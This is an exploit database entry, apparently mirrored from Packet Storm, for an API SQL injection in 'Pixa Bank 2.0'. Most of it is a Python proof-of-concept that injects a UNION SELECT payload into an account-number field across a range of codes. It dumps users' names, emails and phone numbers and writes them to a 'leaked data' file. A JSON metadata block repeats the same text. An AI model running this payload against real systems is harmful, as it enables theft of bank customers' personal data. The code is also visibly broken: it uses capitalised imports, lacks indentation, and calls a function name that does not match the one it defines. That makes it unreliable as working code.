📄 Pixa Bank 2.0 SQL Injection_PACKETSTORM:220748

Description

Pixa Bank version 2.0 remote API SQL injection exploit...

Basic Information

ID PACKETSTORM:220748

Published May 11, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Pixa Bank 2.0 – API SQL Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://pixastudio.com/ |
==================================================================================================================================

[+] Summary : This Python script is used to test and extract data from an API by repeatedly sending requests containing SQL injection payloads into a numeric input field.
It attempts to exploit a potential server vulnerability to extract user information such as name, email address, and phone number from the database.
If the query is successful, the extracted data is displayed and saved to a local text file.
It also includes an additional validation mode to send normal requests and detect valid code within the system.

[+] POC :

Import requests
Import urllib3
Import json

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

URL = "https://127.0.0.1/api/agence-ajax.php"
HEADERS = {
'X-Requested-With': 'XMLHttpRequest',

'User-Agent': 'Mozilla/5.0 indoushka_CORE'
}

def sangrava_miner():

print("[*] Starting the comprehensive data extraction process (indoushka version)...")

print("-" * 60)

for code in range(400, 900):

sql_payload = f"{code}' UNION SELECT GROUP_CONCAT(nom, 0x7c, email, 0x7c, tel) FROM users-- -"

try:
res = requests.post(URL, headers=HEADERS, data={'rib': sql_payload}, verify=False, timeout=5)

if res.status_code == 200:
data = res.json()

if data.get("error") == "N" and data.get("agence"):
extracted_info = data.get("agence")
print(f"[!] Data extracted from {code}:")
print(f" => {extracted_info}")

with open("indoushka_leaked_data.txt", "a", encoding="utf-8") as f:
f.write(f"Code {code}: {extracted_info}\n")
else:

normal_rib= f"00100{code:03d}030030018036"
res_normal= requests.post(URL, headers=HEADERS, data={'rib': normal_rib}, verify=False)
if res_normal.json().get("error") == "N":
print(f"[+] Normal Agency Revealed: {code} | {res_normal.json().get('agence')}")

except Exception as e:
continue

if __name__ == "__main__":
indoushka_miner()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-05-11T17:16:22",
    "description": "Pixa Bank version 2.0 remote API SQL injection exploit...",
    "published": "2026-05-11T00:00:00",
    "modified": "2026-05-11T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Pixa Bank 2.0 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220748",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : Pixa Bank 2.0 \u2013 API SQL Injection                                                                                |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://pixastudio.com/                                                                                          |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Python script is used to test and extract data from an API by repeatedly sending requests containing SQL injection payloads into a numeric input field. \n                     It attempts to exploit a potential server vulnerability to extract user information such as name, email address, and phone number from the database.\n                     If the query is successful, the extracted data is displayed and saved to a local text file. \n    \t\t\t\t It also includes an additional validation mode to send normal requests and detect valid code within the system.\n    \n    [+] POC   :  \n    \n    \n    Import requests\n    Import urllib3\n    Import json\n    \n    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n    \n    URL = \"https://127.0.0.1/api/agence-ajax.php\"\n    HEADERS = {\n    'X-Requested-With': 'XMLHttpRequest',\n    \n    'User-Agent': 'Mozilla/5.0 indoushka_CORE'\n    }\n    \n    def sangrava_miner():\n    \n    print(\"[*] Starting the comprehensive data extraction process (indoushka version)...\")\n    \n    print(\"-\" * 60)\n    \n    for code in range(400, 900):\n    \n    sql_payload = f\"{code}' UNION SELECT GROUP_CONCAT(nom, 0x7c, email, 0x7c, tel) FROM users-- -\"\n    \n    try:\n    res = requests.post(URL, headers=HEADERS, data={'rib': sql_payload}, verify=False, timeout=5)\n    \n    if res.status_code == 200:\n    data = res.json()\n    \n    if data.get(\"error\") == \"N\" and data.get(\"agence\"):\n    extracted_info = data.get(\"agence\")\n    print(f\"[!] Data extracted from {code}:\")\n    print(f\" => {extracted_info}\")\n    \n    with open(\"indoushka_leaked_data.txt\", \"a\", encoding=\"utf-8\") as f:\n    f.write(f\"Code {code}: {extracted_info}\\n\")\n    else:\n    \n    normal_rib= f\"00100{code:03d}030030018036\"\n    res_normal= requests.post(URL, headers=HEADERS, data={'rib': normal_rib}, verify=False)\n    if res_normal.json().get(\"error\") == \"N\":\n    print(f\"[+] Normal Agency Revealed: {code} | {res_normal.json().get('agence')}\")\n    \n    except Exception as e:\n    continue\n    \n    if __name__ == \"__main__\":\n    indoushka_miner()\n    \n    \n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/220748",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220748/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply